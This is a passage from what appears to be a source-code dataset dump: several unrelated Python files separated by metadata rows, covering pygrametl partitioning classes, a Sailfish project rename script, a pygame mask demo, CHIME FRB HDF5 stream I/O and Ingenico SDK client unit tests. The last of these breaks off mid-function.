should have FutureResults replaced by actual return values. Does
not have to be given, but may improve performance when given.
Default: ()
- batchsize: the size of batches (grouped method calls) transferred
between the processes. NB: Large values do not necessarily give
good performance
Default: 500
- queuesize: the maximum amount of waiting batches. Infinite if
less than or equal to 0. NB: Large values do not necessarily give
good performance.
Default: 200
"""
pygrametl.parallel.Decoupled.__init__(self,
obj=dim,
returnvalues=returnvalues,
consumes=consumes,
directupdatepositions=
tuple([(0, a) for a in
attstoconsume]),
batchsize=batchsize,
queuesize=queuesize,
autowrap=False)
if dim in pygrametl._alltables:
pygrametl._alltables.remove(dim) # We add self instead...
pygrametl._alltables.append(self)
def lookup(self, row, namemapping={}):
"""Invoke lookup on the decoupled Dimension in the separate process"""
return self._enqueue('lookup', row, namemapping)
def getbykey(self, keyvalue):
"""Invoke getbykey on the decoupled Dimension in the separate process"""
return self._enqueue('getbykey', keyvalue)
def getbyvals(self, row, namemapping={}):
"Invoke betbycals on the decoupled Dimension in the separate process"
return self._enqueue('getbyvals', row, namemapping)
def insert(self, row, namemapping={}):
"""Invoke insert on the decoupled Dimension in the separate process"""
return self._enqueue('insert', row, namemapping)
def ensure(self, row, namemapping={}):
"""Invoke ensure on the decoupled Dimension in the separate process"""
return self._enqueue('ensure', row, namemapping)
def endload(self):
"""Invoke endload on the decoupled Dimension in the separate process and
return when all waiting method calls have been executed
"""
# first add 'endload' to the batch and then send the batch
self._enqueuenoreturn('endload')
self._endbatch()
self._join()
return None
def scdensure(self, row, namemapping={}):
"Invoke scdensure on the decoupled Dimension in the separate process"
if hasattr(self._obj, 'scdensure'):
return self._enqueue('scdensure', row, namemapping)
else:
raise AttributeError('The object does not support scdensure')
class DecoupledFactTable(pygrametl.parallel.Decoupled):
"""A FactTable-like class that enables parallelism by executing all
operations on a given FactTable in a separate, dedicated process
(that FactTable is said to be "decoupled").
"""
def __init__(self, facttbl, returnvalues=True, consumes=(),
attstoconsume=(), batchsize=500, queuesize=200):
"""Arguments:
- facttbl: the FactTable object to use in a separate process
- returnvalues: decides if return values from method calls on facttbl
should be kept such that they can be fetched by the caller or
another Decoupled instance
- consumes: a sequence of Decoupled objects from which to fetch
returnvalues (that are used to replace FutureResults in arguments).
Default: ()
- attstoconsume: a sequence of the attribute names in rows that
should have FutureResults replaced by actual return values. Does
not have to be given, but may improve performance when given.
Default: ()
- batchsize: the size of batches (grouped method calls) transferred
between the processes. NB: Large values do not necessarily give
good performance
Default: 500
- queuesize: the maximum amount of waiting batches. Infinite if
less than or equal to 0. NB: Large values do not necessarily give
good performance.
Default: 200
"""
pygrametl.parallel.Decoupled.__init__(self,
obj=facttbl,
returnvalues=returnvalues,
consumes=consumes,
directupdatepositions=tuple([(0,
a) for a in attstoconsume]),
batchsize=batchsize,
queuesize=queuesize,
autowrap=False)
if facttbl in pygrametl._alltables:
pygrametl._alltables.remove(facttbl) # We add self instead
pygrametl._alltables.append(self)
def insert(self, row, namemapping={}):
"""Invoke insert on the decoupled FactTable in the separate process"""
return self._enqueue('insert', row, namemapping)
def endload(self):
"""Invoke endload on the decoupled FactTable in the separate process and
return when all waiting method calls have been executed
"""
self._enqueuenoreturn('endload')
self._endbatch()
self._join()
return None
def lookup(self, row, namemapping={}):
"""Invoke lookup on the decoupled FactTable in the separate process"""
if hasattr(self._obj, 'lookup'):
return self._enqueue('lookup', row, namemapping)
else:
raise AttributeError('The object does not support lookup')
def ensure(self, row, namemapping={}):
"""Invoke ensure on the decoupled FactTable in the separate process"""
if hasattr(self._obj, 'ensure'):
return self._enqueue('ensure', row, namemapping)
else:
raise AttributeError('The object does not support ensure')
#######
class BasePartitioner(object):
"""A base class for partitioning between several parts.
See also DimensionPartitioner and FactTablePartitioner.
"""
def __init__(self, parts):
self.parts = list(parts)
self.__nextpart = 0
def parts(self):
"""Return the parts the partitioner works on"""
return self.parts[:]
def addpart(self, part):
"""Add a part"""
self.parts.append(part)
def droppart(self, part=None):
"""Drop a part. If an argument is given, it must be a part of the
patitioner and it will then be removed. If no argument is given,
the first part is removed."""
if part is None:
self.parts.pop()
else:
self.parts.remove(part)
def getpart(self, row, namemapping={}):
"""Find the part that should handle the given row. The provided
implementation in BasePartitioner does only use round robin
partitioning, but subclasses apply other methods """
part = self.parts[self.__nextpart]
self.__nextpart = (self.__nextpart + 1) % len(self.parts)
return part
def endload(self):
"""Call endload on all parts"""
for part in self.parts:
part.endload()
class DimensionPartitioner(BasePartitioner):
"""A Dimension-like class that handles partitioning.
Partitioning is done between a number of Dimension objects called the
parts. The class offers the interface of Dimensions (incl. scdensure
from SlowlyChangingDimension). When a method is called, the
corresponding method on one of the parts (chosen by a user-definable
partitioner function) will be invoked. The parts can operate on a
single physical dimension table or different physical tables.
"""
def __init__(self, parts, getbyvalsfromall=False, partitioner=None):
"""Arguments:
- parts: a sequence of Dimension objects.
- getbyvalsfromall: determines if getbyvals should be answered by
means of all parts (when getbyvalsfromall = True) or only the
first part, i.e., parts[0] (when getbybalsfromall = False).
Default: False
- partitioner: None or a callable p(dict) -> int where the argument
is a dict mapping from the names of the lookupatts to the values of
the lookupatts. The resulting int is used to determine which part
a given row should be handled by.
When partitioner is None, a default partitioner is used. This
partitioner computes the hash value of each value of the lookupatts
and adds them together.
"""
BasePartitioner.__init__(self, parts=parts)
self.getbyvalsfromall = getbyvalsfromall
self.lookupatts = parts[0].lookupatts
self.key = parts[0].key
for p in parts:
if not p.lookupatts == self.lookupatts:
raise ValueError('The parts must have the same lookupatts')
if not p.key == self.key:
raise ValueError('The parts must have the same key')
if partitioner is not None:
self.partitioner = partitioner
else:
# A partitioner that takes the hash of each attribute value in
# row and adds them all together:
# Reading from right to left: get the values, use hash() on each
# of them, and add all the hash values
self.partitioner = lambda row: reduce((lambda x, y: x + y),
map(hash, row.values()))
def getpart(self, row, namemapping={}):
"""Return the part that should handle the given row"""
vals = {}
for att in self.lookupatts:
vals[att] = row[namemapping.get(att) or att]
return self.parts[self.partitioner(vals) % len(self.parts)]
# Below this, methods like those in Dimensions:
def lookup(self, row, namemapping={}):
"""Invoke lookup on the relevant Dimension part"""
part = self.getpart(row, namemapping)
return part.lookup(row, namemapping)
def __getbykeyhelper(self, keyvalue):
# Returns (rowresult, part). part is None if no result was found.
for part in self.parts:
row = part.getbykey(keyvalue)
if row[self.key] is not None:
return (row, part)
return (row, None)
def getbykey(self, keyvalue):
"""Invoke getbykey on the relevant Dimension part"""
return self.__getbykeyhelper(keyvalue)[0]
def getbyvals(self, values, namemapping={}):
"""Invoke getbyvals on the first part or all parts (depending on the
value of the instance's getbyvalsfromall)"""
if not self.getbyvalsfromall:
return self.parts[0].getbyvals(values, namemapping)
res = []
for part in self.parts:
res += part.getbyvals(values, namemapping)
return res
def update(self, row, namemapping={}):
"""Invoke update on the relevant Dimension part"""
keyval = row[namemapping.get(self.key) or self.key]
part = self.__getbykeyhelper(keyval)[1]
if part is not None:
part.update(row, namemapping)
def ensure(self, row, namemapping={}):
"""Invoke ensure on the relevant Dimension part"""
part = self.getpart(row, namemapping)
return part.ensure(row, namemapping)
def insert(self, row, namemapping={}):
"""Invoke insert on the relevant Dimension part"""
part = self.getpart(row, namemapping)
return part.insert(row, namemapping)
def scdensure(self, row, namemapping={}):
"""Invoke scdensure on the relevant Dimension part"""
part = self.getpart(row, namemapping)
return part.scdensure(row, namemapping)
class FactTablePartitioner(BasePartitioner):
"""A FactTable-like class that handles partitioning.
Partitioning is done between a number of FactTable objects called the
parts. The class offers the interface of FactTable. When a method is
called, the corresponding method on one of the parts (chosen by a
user-definable partitioner function) will be invoked. The parts can
operate on a single physical fact table or different physical
tables.
"""
def __init__(self, parts, partitioner=None):
"""
Arguments:
- parts: a sequence of FactTable objects.
- partitioner: None or a callable p(dict) -> int where the argument
is a dict mapping from the names of the keyrefs to the values of
the keyrefs. The resulting int is used to determine which part
a given row should be handled by.
When partitioner is None, a default partitioner is used. This
partitioner computes the sum of all the keyrefs values.
"""
BasePartitioner.__init__(self, parts=parts)
if partitioner is not None:
self.partitioner = partitioner
else:
self.partitioner = lambda row: reduce((lambda x, y: x + y),
row.values())
self.all = parts[0].all
self.keyrefs = parts[0].keyrefs
self.measures = parts[0].measures
for ft in parts:
if not (self.keyrefs == ft.keyrefs and
self.measures == ft.measures):
raise ValueError(
'The parts must have the same measures and keyrefs')
def getpart(self, row, namemapping={}):
"""Return the relevant part for the given row """
vals = {}
for att in self.keyrefs:
vals[att] = row[namemapping.get(att) or att]
return self.parts[self.partitioner(vals) % len(self.parts)]
def insert(self, row, namemapping={}):
"""Invoke insert on the relevant part """
part = self.getpart(row, namemapping)
part.insert(row, namemapping)
def lookup(self, row, namemapping={}):
"""Invoke lookup on the relevant part """
part = self.getpart(row, namemapping)
return part.lookup(row, namemapping)
def ensure(self, row, namemapping={}):
"""Invoke ensure on the relevant part """
part = self.getpart(row, namemapping)
return part.ensure(row, namemapping)
| bsd-2-clause | -3,030,556,517,807,855,600 | 44.030871 | 104 | 0.586979 | false |
amarchen/log4qt-demo-sailfish | rename-to-my-project.py | 1 | 3857 | '''
Created on 23.2.2014
@author: tace ([email protected])
'''
import sys
import os
import argparse
from os import rename
SCRIPT_NAME = os.path.basename(__file__)
def convert_file_names(files, originalName, newName):
print "\n>>>> Convert file names\n"
for fname in files:
if fname.find(originalName) != -1:
newFullName = fname.replace(originalName, newName, 1)
rename(fname, newFullName)
print "Renamed file " + fname + " --> " + newFullName
else:
print "File's '" + fname + "' name does not need conversion!"
print ">>>> DONE converting filenames"
print "====================================================================\n"
def convert_files_content(files, originalText, newText):
print "\n>>>> Convert files content\n"
for file in files:
newlines = []
with open(file, 'r') as f:
found = False
for i, line in enumerate(f, 1):
if line.find(originalText) != -1:
print "Converting text in file '" + file + "' at line " + str(i)
found = True
newlines.append(line.replace(originalText, newText))
if not found:
print "File " + file + " don't need editing."
with open(file, 'w') as f:
for line in newlines:
f.write(line)
print ">>>> DONE converting files content"
print "====================================================================\n"
def get_files(path,
ignored_dirs=['.git'],
ignored_files=[SCRIPT_NAME],
ignore_binary_files=False):
for prefix, dirs, files in os.walk(path):
for ignore in ignored_dirs:
if ignore in dirs:
dirs.remove(ignore)
print "Ignored dir: " + ignore
for name in files:
ignored = False
for ignore in ignored_files:
if ignore in name:
files.remove(ignore)
ignored = True
print "Ignored file: " + ignore
if not ignored:
filename = os.path.join(prefix, name)
if ignore_binary_files and is_binary(filename):
print filename + " is BINARY file and ignored by default!"
else:
yield filename
def is_binary(filename):
"""
Return true if the given filename appears to be binary.
File is considered to be binary if it contains a NULL byte.
FIXME: This approach incorrectly reports UTF-16 as binary.
"""
with open(filename, 'rb') as f:
for block in f:
if '\0' in block:
return True
return False
def check_args(args):
if not args.newName.startswith('harbour-'):
print "Your new app name MUST start with \"harbour-\""
sys.exit()
def main():
parser = argparse.ArgumentParser()
parser.add_argument('newName', help='New name of your program')
parser.add_argument('--originalName', nargs='?', default='harbour-helloworld-pro-sailfish', help="Default is '%(default)s'")
parser.add_argument('--ignoredDirs', nargs='*', default=['.git'], help="Give a list of dir paths separated with space. Default is '%(default)s'")
parser.add_argument('--ignoredFiles', nargs='*', default=[SCRIPT_NAME], help="Give a list of file paths separated with space. Default is '%(default)s'")
args = parser.parse_args()
check_args(args)
files = get_files(".", args.ignoredDirs, args.ignoredFiles)
convert_file_names(files, args.originalName, args.newName)
files = get_files(".", args.ignoredDirs, args.ignoredFiles, ignore_binary_files=True)
convert_files_content(files, args.originalName, args.newName)
if __name__ == '__main__':
main()
| unlicense | 760,484,320,337,282,400 | 37.188119 | 156 | 0.56028 | false |
mark-me/Pi-Jukebox | venv/Lib/site-packages/pygame/examples/mask.py | 1 | 5555 | #!/usr/bin/env python
"""A pgyame.mask collition detection example
exports main()
This module can also be run as a stand-alone program, excepting
one or more image file names as command line arguments.
"""
import sys, random
import pygame, pygame.image, pygame.surface, pygame.time, pygame.display
def maskFromSurface(surface, threshold = 127):
#return pygame.mask.from_surface(surface, threshold)
mask = pygame.mask.Mask(surface.get_size())
key = surface.get_colorkey()
if key:
for y in range(surface.get_height()):
for x in range(surface.get_width()):
if surface.get_at((x,y)) != key:
mask.set_at((x,y),1)
else:
for y in range(surface.get_height()):
for x in range (surface.get_width()):
if surface.get_at((x,y))[3] > threshold:
mask.set_at((x,y),1)
return mask
def vadd(x,y):
return [x[0]+y[0],x[1]+y[1]]
def vsub(x,y):
return [x[0]-y[0],x[1]-y[1]]
def vdot(x,y):
return x[0]*y[0]+x[1]*y[1]
class Sprite:
def __init__(self, surface, mask = None):
self.surface = surface
if mask:
self.mask = mask
else:
self.mask = maskFromSurface(self.surface)
self.setPos([0,0])
self.setVelocity([0,0])
def setPos(self,pos):
self.pos = [pos[0],pos[1]]
def setVelocity(self,vel):
self.vel = [vel[0],vel[1]]
def move(self,dr):
self.pos = vadd(self.pos,dr)
def kick(self,impulse):
self.vel[0] += impulse[0]
self.vel[1] += impulse[1]
def collide(self,s):
"""Test if the sprites are colliding and
resolve the collision in this case."""
offset = [int(x) for x in vsub(s.pos,self.pos)]
overlap = self.mask.overlap_area(s.mask,offset)
if overlap == 0:
return
"""Calculate collision normal"""
nx = (self.mask.overlap_area(s.mask,(offset[0]+1,offset[1])) -
self.mask.overlap_area(s.mask,(offset[0]-1,offset[1])))
ny = (self.mask.overlap_area(s.mask,(offset[0],offset[1]+1)) -
self.mask.overlap_area(s.mask,(offset[0],offset[1]-1)))
if nx == 0 and ny == 0:
"""One sprite is inside another"""
return
n = [nx,ny]
dv = vsub(s.vel,self.vel)
J = vdot(dv,n)/(2*vdot(n,n))
if J > 0:
"""Can scale up to 2*J here to get bouncy collisions"""
J *= 1.9
self.kick([nx*J,ny*J])
s.kick([-J*nx,-J*ny])
return
"""Separate the sprites"""
c1 = -overlap/vdot(n,n)
c2 = -c1/2
self.move([c2*nx,c2*ny])
s.move([(c1+c2)*nx,(c1+c2)*ny])
def update(self,dt):
self.pos[0] += dt*self.vel[0]
self.pos[1] += dt*self.vel[1]
def main(*args):
"""Display multiple images bounce off each other using collition detection
Positional arguments:
one or more image file names.
This pygame.masks demo will display multiple moving sprites bouncing
off each other. More than one sprite image can be provided.
"""
if len(args) == 0:
raise ValueError("Require at least one image file name: non given")
print ('Press any key to quit')
screen = pygame.display.set_mode((640,480))
images = []
masks = []
for impath in args:
images.append(pygame.image.load(impath).convert_alpha())
masks.append(maskFromSurface(images[-1]))
numtimes = 10
import time
t1 = time.time()
for x in range(numtimes):
m = maskFromSurface(images[-1])
t2 = time.time()
print ("python maskFromSurface :%s" % (t2-t1))
t1 = time.time()
for x in range(numtimes):
m = pygame.mask.from_surface(images[-1])
t2 = time.time()
print ("C pygame.mask.from_surface :%s" % (t2-t1))
sprites = []
for i in range(20):
j = i % len(images)
s = Sprite(images[j],masks[j])
s.setPos((random.uniform(0,screen.get_width()),
random.uniform(0,screen.get_height())))
s.setVelocity((random.uniform(-5,5),random.uniform(-5,5)))
sprites.append(s)
pygame.time.set_timer(pygame.USEREVENT,33)
while 1:
event = pygame.event.wait()
if event.type == pygame.QUIT:
return
elif event.type == pygame.USEREVENT:
"""Do both mechanics and screen update"""
screen.fill((240,220,100))
for i in range(len(sprites)):
for j in range(i+1,len(sprites)):
sprites[i].collide(sprites[j])
for s in sprites:
s.update(1)
if s.pos[0] < -s.surface.get_width()-3:
s.pos[0] = screen.get_width()
elif s.pos[0] > screen.get_width()+3:
s.pos[0] = -s.surface.get_width()
if s.pos[1] < -s.surface.get_height()-3:
s.pos[1] = screen.get_height()
elif s.pos[1] > screen.get_height()+3:
s.pos[1] = -s.surface.get_height()
screen.blit(s.surface,s.pos)
pygame.display.update()
elif event.type == pygame.KEYDOWN:
return
if __name__ == '__main__':
if len(sys.argv) < 2:
print ('Usage: mask.py <IMAGE> [<IMAGE> ...]')
print ('Let many copies of IMAGE(s) bounce against each other')
print ('Press any key to quit')
else:
main(*sys.argv[1:])
| agpl-3.0 | 1,926,169,614,142,610,700 | 30.5625 | 78 | 0.540954 | false |
CHIMEFRB/ch_frb_io | ch_frb_io/stream.py | 1 | 13853 | """
IO for intensity data.
"""
import os
from os import path
import warnings
import logging
import glob
import numpy as np
import h5py
import bitshuffle.h5 as bshufh5
logger = logging.getLogger(__name__)
# Default chunk and file size.
CHUNKS = (64, 2, 256)
NTIME_PER_FILE = CHUNKS[2] * 64
# Dataset definitions.
DATASETS = {
# 'time' is a special axis defining dataset. Must have units seconds since
# it is used for filenames.
'index_map/time' : {
'dtype' : np.float64,
'chunks' : (CHUNKS[2],),
},
'intensity' : {
'dtype' : np.float32,
'axis' : ['freq', 'pol', 'time'],
'chunks' : CHUNKS,
'compression' : bshufh5.H5FILTER,
'compression_opts' : (0, bshufh5.H5_COMPRESS_LZ4),
},
'weight' : {
'dtype' : np.uint8,
'axis' : ['freq', 'pol', 'time'],
'chunks' : CHUNKS,
'compression' : bshufh5.H5FILTER,
'compression_opts' : (0, bshufh5.H5_COMPRESS_LZ4),
},
}
class StreamWriter(object):
def __init__(self, outdir='', freq=None, pol=None, attrs=None):
# Default values for freq and pol.
if freq is None:
from ch_L1mock import constants
freq = (constants.FPGA_FREQ0 + np.arange(constants.FPGA_NFREQ)
* constants.FPGA_DELTA_FREQ)
if pol is None:
pol = ['XX', 'YY']
self._outdir = outdir
self._freq = freq
self._nfreq = len(freq)
self._pol = pol
self._npol = len(pol)
if attrs is None:
attrs = {}
self._attrs = attrs
# For now these are statically defined.
self._ntime_per_file = NTIME_PER_FILE
self._ntime_block = CHUNKS[2]
self._datasets = dict(DATASETS)
assert self._ntime_per_file % self.ntime_block == 0
# Initialize dataset buffers.
self._buffers = {}
datasets = dict(self._datasets)
time_info = datasets.pop('index_map/time')
self._buffers['index_map/time'] = np.empty(self.ntime_block,
dtype=time_info['dtype'])
for name, info in datasets.items():
if info['axis'] != ['freq', 'pol', 'time']:
msg = "Only ('freq', 'pol', 'time') datasets supported."
raise NotImplementedError(msg)
self._buffers[name] = np.empty(
(self._nfreq, self._npol, self.ntime_block),
dtype = info['dtype']
)
if self.ntime_block % info['chunks'][2]:
msg = "Integer number of chunks must fit into buffer."
raise ValueError(msg)
# TODO Check sanity of other chunk dimensions.
# Buffers initially empty.
self._ntime_buffer = 0
# Initialize output.
self._file = None
self._t0 = None # Offset for file names.
if not path.isdir(outdir):
os.mkdir(outdir)
# Ensure that warnings only issued once.
self._alignment_warned = False
def __del__(self):
self.finalize()
@property
def ntime_block(self):
"""Target write size. The size of the buffer when full."""
return self._ntime_block
@property
def ntime_buffer(self):
"""Current number of times currently in the buffer."""
return self._ntime_buffer
@property
def ntime_current_file(self):
"""Number of times in current file."""
if self._file is None:
return 0
else:
return len(self._file['index_map/time'])
@property
def ntime_per_file(self):
return self._ntime_per_file
def absorb_chunk(self, **kwargs):
"""
"""
time = kwargs.pop('time')
ntime = len(time)
for name, data in kwargs.items():
if data.shape != (self._nfreq, self._npol, ntime):
msg = "Inconsistent dimensions for dataset %s" % name
raise ValueError(msg)
kwargs['index_map/time'] = time
assert set(kwargs.keys()) == set(DATASETS.keys())
ntime_consumed = 0
while ntime_consumed < ntime:
ntime_remaining = ntime - ntime_consumed
if self.ntime_buffer == 0 and ntime_remaining >= self.ntime_block:
# If the buffers are empty and ntime is bigger than the buffer
# size, do a direct write.
to_write = (ntime_remaining
- (ntime_remaining % self.ntime_block))
to_write = min(to_write,
self._ntime_per_file - self.ntime_current_file)
self._append_data_disk(
ntime_consumed,
ntime_consumed + to_write,
**kwargs
)
ntime_consumed = ntime_consumed + to_write
else:
# Add data to buffers.
to_buffer = min(self.ntime_block - self.ntime_buffer,
ntime_remaining)
self._append_data_buffers(
ntime_consumed,
ntime_consumed + to_buffer,
**kwargs
)
ntime_consumed = ntime_consumed + to_buffer
def flush(self):
if (self.ntime_buffer != self.ntime_block
and not self._alignment_warned):
msg = ("Flushing buffers that are not full. Expect alignment"
" issues and performance degradation.")
logger.warning(msg)
self._alignment_warned = True
self._append_data_disk(0, self.ntime_buffer, **self._buffers)
self._ntime_buffer = 0
def finalize(self):
# Do nothing if this has already been called.
if hasattr(self, '_datasets'):
# Suppress warning if the buffers aren't full.
self._alignment_warned = True
self.flush()
if self._file:
self._file.close()
# The following does two things: releases memory which is nice, but
# more importantly invalidates the instance.
del self._buffers
del self._datasets
def _initialize_file(self, first_time):
# Files are named with their starting time relative to beginning of
# acquisition.
if self._t0 is None:
self._t0 = first_time
first_time -= self._t0
fname = '%08d.h5' % int(round(first_time))
fname = path.join(self._outdir, fname)
# Open file and write non-time-dependant datasets.
f = h5py.File(fname, mode='w')
for name, value in self._attrs.items():
f.attrs[name] = value
# Index map
im = f.create_group('index_map')
im.create_dataset('pol', data=self._pol)
im.create_dataset('freq', data=self._freq)
# Initialize time dependant datasets.
datasets = dict(self._datasets)
time_dset_info = datasets.pop('index_map/time')
f.create_dataset(
'index_map/time',
shape=(0,),
maxshape=(None,),
dtype=time_dset_info['dtype'],
chunks=time_dset_info['chunks'],
)
for dset_name, dset_info in datasets.items():
compression = dset_info.get('compression', None)
compression_opts = dset_info.get('compression_opts', None)
dset = f.create_dataset(
dset_name,
shape=(self._nfreq, self._npol, 0),
maxshape=(self._nfreq, self._npol, None),
dtype=dset_info['dtype'],
chunks=dset_info['chunks'],
compression=compression,
compression_opts=compression_opts,
)
dset.attrs['axis'] = dset_info['axis']
self._file = f
def _append_data_disk(self, start, stop, **kwargs):
if self._file is None:
first_time = kwargs['index_map/time'][start]
self._initialize_file(first_time)
ntime_disk = self.ntime_current_file
ntime = stop - start
time = kwargs.pop('index_map/time')
self._file['index_map/time'].resize((ntime_disk + ntime,))
self._file['index_map/time'][ntime_disk:] = time[start:stop]
for name, data in kwargs.items():
dset = self._file[name]
dset.resize((self._nfreq, self._npol, ntime_disk + ntime))
dset[...,ntime_disk:] = data[...,start:stop]
if ntime_disk + ntime >= self._ntime_per_file:
self._file.close()
self._file = None
def _append_data_buffers(self, start, stop, **kwargs):
ntime = stop - start
for name, data in kwargs.items():
buf = self._buffers[name]
buf_sl = np.s_[...,self.ntime_buffer:self.ntime_buffer + ntime]
buf[buf_sl] = data[...,start:stop]
self._ntime_buffer += ntime
if self.ntime_buffer == self.ntime_block:
self.flush()
class StreamReader(object):
def __init__(self, datadir):
filenames = glob.glob(path.join(datadir, ("[0-9]" * 8 + '.h5')))
filenames.sort()
self._filenames = filenames
first_file = h5py.File(filenames[0], mode='r')
self._attrs = first_file.attrs
self._freq = first_file['index_map/freq'][:]
self._pol = first_file['index_map/pol'][:]
time_arrs = []
for fname in filenames:
f = h5py.File(fname, mode='r')
time_arrs.append(f['index_map/time'][:])
f.close()
self._ntimes = [len(t) for t in time_arrs]
self._time = np.concatenate(time_arrs)
datasets = dict(DATASETS)
del datasets['index_map/time']
for k in datasets.keys():
if k not in first_file:
del datasets[k]
self._datasets = datasets
self._current_time_ind = 0
self._time_chunk = CHUNKS[2]
# The following no longer a constraint.
#for nt in self._ntimes[:-1]:
# if nt % self._time_chunk:
# raise ValueError("Files don't have integer number of chunks.")
self._h5_cache_start_ind = None
first_file.close()
@property
def attrs(self):
return dict(self._attrs)
@property
def filenames(self):
return list(self._filenames)
@property
def freq(self):
return self._freq.copy()
@property
def pol(self):
return self._pol.copy()
@property
def time(self):
return self._time.copy()
@property
def current_time_ind(self):
return self._current_time_ind
@property
def ntime_block(self):
"""Target read size."""
def finalize(self):
pass
#[f.close() for f in self._files]
def __del__(self):
self.finalize()
def yield_chunk(self, ntime=None):
start_time_ind = self.current_time_ind
ntime_remaining = len(self.time) - start_time_ind
if ntime is None:
ntime = min(self._chunk, ntime_remaining)
if ntime > ntime_remaining or ntime == 0:
raise StopIteration()
out = {}
out['time'] = self.time[start_time_ind:start_time_ind + ntime]
dataset_names = self._datasets.keys()
for dataset_name in dataset_names:
out[dataset_name] = []
while self.current_time_ind < start_time_ind + ntime:
# Ensure 'current_time_ind' is in the cache.
self._cache_h5_chunk()
# Determine where in the cache current_time_ind is.
h5_cache_ind = self.current_time_ind - self._h5_cache_start_ind
h5_cache_size = self._h5_cache[dataset_names[0]].shape[-1]
# How much data to copy from the current cache.
ntime_this_cache = min(
# Either the whole cache...
h5_cache_size - h5_cache_ind,
# ... or the rest of the data needed for this chunk.
start_time_ind + ntime - self.current_time_ind,
)
h5_cache_slice = np.s_[h5_cache_ind:
h5_cache_ind + ntime_this_cache]
for dataset_name in dataset_names:
out[dataset_name].append(
self._h5_cache[dataset_name][...,h5_cache_slice])
self._current_time_ind += ntime_this_cache
# Concatenate all the h5 chunks together to form an output chunk.
for dataset_name in dataset_names:
out[dataset_name] = np.concatenate(out[dataset_name], -1)
return out
def _cache_h5_chunk(self):
file_time_ind = self.current_time_ind
file_ntimes = list(self._ntimes)
which_file = 0
while file_time_ind >= file_ntimes[which_file]:
file_time_ind -= file_ntimes[which_file]
which_file += 1
# Get the hdf5 chunk that contains the index.
file_time_ind = (int(file_time_ind // self._time_chunk)
* self._time_chunk)
h5_cache_start_ind = (np.sum(file_ntimes[:which_file], dtype=int)
+ file_time_ind)
if self._h5_cache_start_ind == h5_cache_start_ind:
return
self._h5_cache_start_ind = h5_cache_start_ind
f = h5py.File(self._filenames[which_file], mode='r')
self._h5_cache = {}
for dataset_name in self._datasets.keys():
dataset = f[dataset_name]
self._h5_cache[dataset_name] = dataset[...,
file_time_ind:file_time_ind + self._time_chunk]
f.close()
| mit | 5,522,448,106,118,149,000 | 32.953431 | 79 | 0.532664 | false |
martinohanlon/initio | pygametest.py | 1 | 1057 | import pygame
from pygame.locals import *
import os, sys
# set SDL to use the dummy NULL video driver,
# so it doesn't need a windowing system.
os.environ["SDL_VIDEODRIVER"] = "dummy"
# init pygame
pygame.init()
# create a 1x1 pixel screen, its not used
screen = pygame.display.set_mode((1, 1))
# init the joystick control
pygame.joystick.init()
# how many joysticks are there
print pygame.joystick.get_count()
# get the first joystick
joy = pygame.joystick.Joystick(0)
# init that joystick
joy.init()
running = True
while(running):
for event in pygame.event.get():
#thumb sticks, trigger buttons
if event.type == JOYAXISMOTION:
print event.value, event.axis
#d pad
elif event.type == JOYHATMOTION:
print event.value
#button pressed
elif event.type == JOYBUTTONDOWN:
print event.button
#button released
elif event.type == JOYBUTTONUP:
print event.button
| mit | -8,737,356,488,751,904,000 | 20.978261 | 46 | 0.613056 | false |
Ingenico-ePayments/connect-sdk-python3 | tests/unit/test_client.py | 1 | 5484 | import base64
import unittest
from datetime import timedelta
from unittest.mock import Mock, MagicMock
from ingenico.connect.sdk.connection import Connection
from ingenico.connect.sdk.defaultimpl.default_marshaller import DefaultMarshaller
from ingenico.connect.sdk.factory import Factory
from ingenico.connect.sdk.pooled_connection import PooledConnection
from ingenico.connect.sdk.request_header import RequestHeader
from tests.unit.test_factory import PROPERTIES_URI, API_KEY_ID, SECRET_API_KEY
class ClientTest(unittest.TestCase):
"""Tests for the Client class that test if
the function Client.with_client_meta_info correctly returns a client that is only modified if necessary.
Also contains tests testing if connection settings are propagated properly to the connection object
"""
def test_with_client_meta_info(self):
"""Tests if the function withClientMetaInfo alters a client when it needs to and does nothing if not required"""
client1 = Factory.create_client_from_file(PROPERTIES_URI, API_KEY_ID, SECRET_API_KEY)
# client2 = client1.with_client_meta_info(None)
client2 = client1.with_client_meta_info(None)
client_meta_info = DefaultMarshaller.INSTANCE().marshal({"test": "test"})
client3 = client1.with_client_meta_info(client_meta_info)
client4 = client3.with_client_meta_info(client_meta_info)
client5 = client3.with_client_meta_info(None)
self.assertIsNone(client1._client_headers)
self.assertIs(client1, client2)
self.assertIsNot(client1, client3)
self.assertClientHeaders(client3, client_meta_info)
self.assertIs(client3, client4)
self.assertIsNot(client3, client5)
self.assertIsNone(client5._client_headers)
def assertClientHeaders(self, client, client_meta_info):
"""Checks that the 'ClientMetaInfo' header with client_meta_info is stored properly in the client"""
headers = client._client_headers
header_value = base64.b64encode(client_meta_info.encode("utf-8"))
expected = RequestHeader("X-GCS-ClientMetaInfo", header_value)
found = False
for header in headers:
if str(expected) == str(header):
found = True
self.assertTrue(found, "header {0} was not found in {1}".format(expected, headers))
def test_close_idle_connection_not_pooled(self):
"""Tests that the setting to close an idle connection in a client propagates to the connection
for an unpooled connection
"""
mock = MagicMock(spec=Connection(), autospec=True)
function_mock = Mock(name="close_idle_connections_mock")
mock.attach_mock(function_mock, "close_idle_connections")
session = Factory.create_session_from_file(
configuration_file_name=PROPERTIES_URI, connection=mock,
api_key_id=API_KEY_ID, secret_api_key=SECRET_API_KEY)
client = Factory.create_client_from_session(session)
client.close_idle_connections(timedelta(seconds=5)) # seconds
function_mock.assert_not_called()
def test_close_idle_connection_pooled(self):
"""Tests that the setting to close an idle connection in a client propagates to the connection
for a pooled connection
"""
pooled_mock = MagicMock(spec=PooledConnection(), autospec=True)
function_mock = Mock(name="close_idle_connections_mock")
pooled_mock.attach_mock(function_mock, "close_idle_connections")
session = Factory.create_session_from_file(
configuration_file_name=PROPERTIES_URI, connection=pooled_mock,
api_key_id=API_KEY_ID, secret_api_key=SECRET_API_KEY)
client = Factory.create_client_from_session(session)
client.close_idle_connections(timedelta(seconds=5)) # seconds
function_mock.assert_called_once_with(timedelta(seconds=5))
def test_close_expired_connections_not_pooled(self):
"""Tests that the setting to close an expired connection in a client does not propagate to the connection
for an unpooled connection
"""
mock = MagicMock(spec=Connection(), autospec=True)
function_mock = Mock(name="close_expired_connections_mock")
mock.attach_mock(function_mock, "close_expired_connections")
session = Factory.create_session_from_file(
configuration_file_name=PROPERTIES_URI,
api_key_id=API_KEY_ID, secret_api_key=SECRET_API_KEY, connection=mock)
client = Factory.create_client_from_session(session)
client.close_expired_connections()
function_mock.assert_not_called()
def test_close_expired_connections_pooled(self):
